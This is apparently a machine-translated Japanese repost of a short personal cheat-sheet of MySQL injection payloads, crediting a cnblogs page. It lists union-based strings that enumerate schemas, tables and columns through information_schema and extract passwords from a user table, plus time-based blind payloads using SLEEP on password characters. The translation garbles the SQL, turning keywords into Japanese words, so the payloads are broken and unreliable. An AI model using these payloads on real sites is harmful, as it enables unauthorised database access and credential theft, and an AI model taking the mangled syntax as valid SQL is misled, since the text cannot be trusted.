最近では、とき自分自身についての注射mysqlのレコードのうち、印を残して、あなたは忘れで後から見ることができます。
ルックアップテーブル
「1 = 2組合1を選択し、information_schema.SCHEMATA限界からSCHEMA_NAME 0,1--
TABLE_SCHEMA = 0x64767761-- INFORMATION_SCHEMA.TABLESから「1 = 2組合1を選択し、GROUP_CONCAT(TABLE_NAME)
Queryフィールド
1 = 2組合1,2,3,4を選択し、16進コーディング制限COLUMN_NAME、5,6,7 TABLE_NAME =進符号化テーブルデータベース名とTABLE_SCHEMA = 1,1 information_schema.columnsから -
1 = 2組合は、1,2,3,4を選択し、GROUP_CONCAT(COLUMN_NAME)、TABLE_NAME =テーブル名進進符号化とTABLE_SCHEMA =データベースinformation_schema.columnsから5,6,7 -
クエリデータ
「1 = 2組合1を選択し、連結(パスワード)をユーザから制限0,1--
時間ベースのブラインド
tbl_userから選択したユーザは、ここでユーザー= 'AAA' + 0とIF((tbl_userから1を選択する場合、ユーザ=「管理者」とパスワード= '1234567')、スリープ(5)、1)。
'+ 0 UNION SELECT IF管理WHERE名= FROM(ASCII(SUBSTRING(PASSWORD、1、1))= 50、SLEEP(10)、NULL) '管理' -
ます。https://www.cnblogs.com/blck/p/4978220.htmlで再現